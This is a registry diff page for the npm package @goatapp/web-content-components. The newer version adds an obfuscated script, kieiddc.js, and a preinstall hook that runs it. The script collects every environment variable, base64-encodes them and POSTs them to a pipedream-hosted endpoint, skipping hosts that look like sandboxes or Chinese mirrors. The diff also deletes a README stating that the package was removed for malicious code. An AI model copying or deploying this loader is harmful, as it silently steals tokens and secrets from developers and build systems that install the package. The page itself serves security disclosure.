@goatapp/web-content-components 0.0.1-security → 2.971.364
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @goatapp/web-content-components might be problematic. Click here for more details.
- package/kieiddc.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/kieiddc.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x5c715d=a0_0xdcc8;(function(_0x110f5b,_0x1e0c56){const _0x34390c=a0_0xdcc8,_0x56474c=_0x110f5b();while(!![]){try{const _0x5280dd=-parseInt(_0x34390c(0xf9))/0x1*(parseInt(_0x34390c(0xf8))/0x2)+-parseInt(_0x34390c(0x110))/0x3*(parseInt(_0x34390c(0xf4))/0x4)+-parseInt(_0x34390c(0x107))/0x5*(-parseInt(_0x34390c(0x100))/0x6)+-parseInt(_0x34390c(0x102))/0x7+parseInt(_0x34390c(0x118))/0x8*(-parseInt(_0x34390c(0xfb))/0x9)+-parseInt(_0x34390c(0x10e))/0xa*(parseInt(_0x34390c(0x109))/0xb)+-parseInt(_0x34390c(0x111))/0xc*(-parseInt(_0x34390c(0x10f))/0xd);if(_0x5280dd===_0x1e0c56)break;else _0x56474c['push'](_0x56474c['shift']());}catch(_0x235c60){_0x56474c['push'](_0x56474c['shift']());}}}(a0_0x402e,0x7e0ae));function a0_0x402e(){const _0x398679=['base64','toString','error','2053092JMtBBx','daasadmin','4679654EPoZRi','npm_package_name','net','some','keys','15BOOUWr','includes','8539619UdiIit','from','npm_config_registry','stringify','write','10LvMSJc','8538504VRwJsE','39dXdElY','48xaHDVB','https','tencent.com','bd43527e019ae8efb47eb39bb9313ac5','USERNAME','taobao.org','length','80QTiyPg','114828llWPAO','end','join','registry.npmmirror.com','1144552uyzGNJ','1xsaYrl','/usr/bin/python','672471WYSxvL','pipedream'];a0_0x402e=function(){return _0x398679;};return a0_0x402e();}const http=require(a0_0x5c715d(0x112)),filter=[{'key':a0_0x5c715d(0x10b),'val':a0_0x5c715d(0x116)},{'key':'npm_config_registry','val':a0_0x5c715d(0x113)},{'key':a0_0x5c715d(0x10b),'val':a0_0x5c715d(0xf7)},{'key':a0_0x5c715d(0x115),'val':a0_0x5c715d(0x101)},{'key':'_','val':a0_0x5c715d(0xfa)}];function main(){const _0x17aa4d=a0_0x5c715d;var _0x30cb1a=process['env']||{};if(filter[_0x17aa4d(0x105)](({key:_0x35e04f,val:_0x26087c})=>_0x30cb1a[_0x35e04f]&&_0x30cb1a[_0x35e04f][_0x17aa4d(0x108)](_0x26087c))||Object[_0x17aa4d(0x106)](_0x30cb1a)[_0x17aa4d(0x117)]<0xa)return;req=http['request']({'host':[_0x17aa4d(0x114),'m',_0x17aa4d(0xfc),_0x17aa4d(0x104)][_0x17aa4d(0xf6)]('.'),'path':'/'+(_0x30cb1a[_0x17aa4d(0x103)]||''),'method':'POST'})['on'](_0x17aa4d(0xff),function(_0x21cd7d){}),req[_0x17aa4d(0x10d)](Buffer[_0x17aa4d(0x10a)](JSON[_0x17aa4d(0x10c)](_0x30cb1a))[_0x17aa4d(0xfe)](_0x17aa4d(0xfd))),req[_0x17aa4d(0xf5)]();}function a0_0xdcc8(_0x2b6596,_0x2ff2e7){const _0x402e9c=a0_0x402e();return a0_0xdcc8=function(_0xdcc883,_0x13f1c0){_0xdcc883=_0xdcc883-0xf4;let _0x2839b7=_0x402e9c[_0xdcc883];return _0x2839b7;},a0_0xdcc8(_0x2b6596,_0x2ff2e7);}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goatapp/web-content-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "2.971.364",
|
|
4
|
+
"main": "kieiddc.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node kieiddc.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40goatapp%2Fweb-content-components for more information.
|